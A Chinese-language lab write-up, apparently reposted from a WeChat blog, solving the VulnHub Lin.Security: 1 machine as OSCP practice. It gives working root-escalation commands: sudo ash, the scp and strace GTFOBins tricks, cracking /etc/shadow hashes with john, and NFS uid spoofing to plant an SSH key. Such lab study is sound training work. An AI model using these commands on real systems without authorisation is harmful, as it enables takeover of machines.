【OSCP模拟-No.40】 Lin.Security: 1靶机渗透测试练习

admin 2024年2月27日17:43:46评论12 views字数 2517阅读8分23秒阅读模式

---------------------------------------------------------------

本文题干阅读时间推荐20min,靶场练习推荐3h

----------------------------------------------------------------

如果各位童鞋想讨论以下相关内容,欢迎关注公众号, 联系我:

  • OSCP相关技术备考中

  • CISSP备考经验已通过认证

  • CCSK(云安全)已通过认证

  • ISO/IEC 27001 Foundation已通过认证

----------------------------------------------------------------

一、前言

主要利用方式:   若干命令sudo 提权   john hash密码爆破    nfs挂载+strace sudo 提权

二、靶机信息

  靶场: vulnhub.com  靶机名称: LIN.SECURITY: 1  难度: 中级  发布时间: 2018711  下载地址:https://www.vulnhub.com/entry/linsecurity-1,244/  备注:一个非常适合练习的靶场

三、虚拟机配置

VirtualBox、网络连接模式:NAT模式、DHCP服务:启用、IP地址:自动分配攻击IP:10.0.2.31靶机IP:10.0.2.29

四、信息收集

1、前置描述

在 in.security,我们想开发一个 Linux 虚拟机,在撰写本文时,它基于最新的 Ubuntu 发行版 (18.04 LTS),但存在许多漏洞,允许用户升级到盒子上的 root。这旨在帮助了解某些内置应用程序和服务在配置错误时如何被攻击者滥用。

首先,您可以使用以下凭据登录主机:bob/secret

2探测靶机ip地址

└─$ sudo arp-scan -I eth0 -l

【OSCP模拟-No.40】 Lin.Security: 1靶机渗透测试练习

3探测靶机ip端口及端口具体服务

└─$ sudo nmap -p- 10.0.2.29  

【OSCP模拟-No.40】 Lin.Security: 1靶机渗透测试练习

└─$ sudo nmap -p22,111,2049,35317,40525,43979,60691 -sV -A 10.0.2.29

【OSCP模拟-No.40】 Lin.Security: 1靶机渗透测试练习

通过扫描,发现了111端口的rpcbind服务以及2049nfs的服务

五、漏洞利用(突破边界)及提权

方法一:sudo提权

4.1、既然已经提示有账号密码(bob/secret),SSH登录,并验证账号权限

└─$ ssh bob@10.0.2.29bob@linsecurity:~$ id 

【OSCP模拟-No.40】 Lin.Security: 1靶机渗透测试练习

4.2、利用poc,获取root权限

ash:https://gtfobins.github.io/gtfobins/ash/

【OSCP模拟-No.40】 Lin.Security: 1靶机渗透测试练习

bob@linsecurity:~$ sudo ash

【OSCP模拟-No.40】 Lin.Security: 1靶机渗透测试练习

SCP:https://gtfobins.github.io/gtfobins/scp/

【OSCP模拟-No.40】 Lin.Security: 1靶机渗透测试练习

bob@linsecurity:~$ TF=$(mktemp)bob@linsecurity:~$ echo 'sh 0<&2 1>&2' > $TFbob@linsecurity:~$ chmod +x "$TF"bob@linsecurity:~$ sudo scp -S $TF x y:# iduid=0(root) gid=0(root) groups=0(root)

【OSCP模拟-No.40】 Lin.Security: 1靶机渗透测试练习

方法二:hash密码破解

5.1、查看/etc/shadow,能看到部分用户的密码hash

【OSCP模拟-No.40】 Lin.Security: 1靶机渗透测试练习

字段

含义

用户名

用户登录系统是使用的用户名

密码

密码位

UID

用户表示号

GID

缺省组标识号

注释性描述

例如存放用户全名等信息

宿主目录

用户登录系统后的缺省目录

命令解释器

用户使用的shell,默认为bash

5.2、在靶机中发现passwd文件中存储hash密码

insecurity:AzER3pBZh6WZE:0:0::/:/bin/sh

5.3、使用johnhashcat进行破解

【OSCP模拟-No.40】 Lin.Security: 1靶机渗透测试练习

└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

【OSCP模拟-No.40】 Lin.Security: 1靶机渗透测试练习

提取账号及密码:insecurity/P@ssw0rd

5.4ssh切换登录,查看权限

【OSCP模拟-No.40】 Lin.Security: 1靶机渗透测试练习

方法三:NFS提权

6.1、看到开放2049端口,对应nfs服务。

NFS(Network File System)网络文件系统,它允许网络中的计算机之间通过TCP/IP网络共享资源。在NFS的应用中,本地NFS的客户端应用可以透明地读写位于远端NFS服务器上的文件,就像访问本地文件一样。

6.2kali上安装nfs客户端工具

【OSCP模拟-No.40】 Lin.Security: 1靶机渗透测试练习

6.3showmount命令查看靶机给的网络共享文件夹列表

└─$ showmount -e 10.0.2.29 

【OSCP模拟-No.40】 Lin.Security: 1靶机渗透测试练习

6.4、在tmp创建目录并挂载次网络目录

└─$ cd /tmp 

【OSCP模拟-No.40】 Lin.Security: 1靶机渗透测试练习

└─$ mkdir nfs  

【OSCP模拟-No.40】 Lin.Security: 1靶机渗透测试练习

└─$ sudo mount -t nfs 10.0.2.29:/home/peter /tmp/nfs

【OSCP模拟-No.40】 Lin.Security: 1靶机渗透测试练习

6.5、查看挂载是否生效

【OSCP模拟-No.40】 Lin.Security: 1靶机渗透测试练习

6.6、在Kali上挂载了NFS共享,可以创建一个具有与导出(1001/1005)相同的uid/gid的新用户,然后又成为该用户即可

└─$ sudo groupadd -g 1005 peter 

└─$ sudo adduser peter -uid 1001 -gid 1005

【OSCP模拟-No.40】 Lin.Security: 1靶机渗透测试练习

【OSCP模拟-No.40】 Lin.Security: 1靶机渗透测试练习

6.7、客户端切换peter用户,生成ssh公钥文件

【OSCP模拟-No.40】 Lin.Security: 1靶机渗透测试练习

【OSCP模拟-No.40】 Lin.Security: 1靶机渗透测试练习

6.8、将peter用户的key导入到/tmp/nfs.ssh文件夹中

【OSCP模拟-No.40】 Lin.Security: 1靶机渗透测试练习

6.9、将id_rsa.pub导入authorized_key文件并赋权600

└─$ cat id_rsa.pub > authorized_keys

【OSCP模拟-No.40】 Lin.Security: 1靶机渗透测试练习

6.10sshid_rsa登录

【OSCP模拟-No.40】 Lin.Security: 1靶机渗透测试练习

6.11strace sudo 提权

https://gtfobins.github.io/gtfobins/strace/

【OSCP模拟-No.40】 Lin.Security: 1靶机渗透测试练习

peter@linsecurity:~$ sudo strace -o /dev/null /bin/sh

【OSCP模拟-No.40】 Lin.Security: 1靶机渗透测试练习

-----------------------------------------------

本期靶场到此就结束啦,我们下期再见

--------------------------------------------------

走之前记得点个在看~

原文始发于微信公众号(从放弃到入门):【OSCP模拟-No.40】 Lin.Security: 1靶机渗透测试练习

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月27日17:43:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【OSCP模拟-No.40】 Lin.Security: 1靶机渗透测试练习https://cn-sec.com/archives/2530469.html

发表评论

匿名网友 填写信息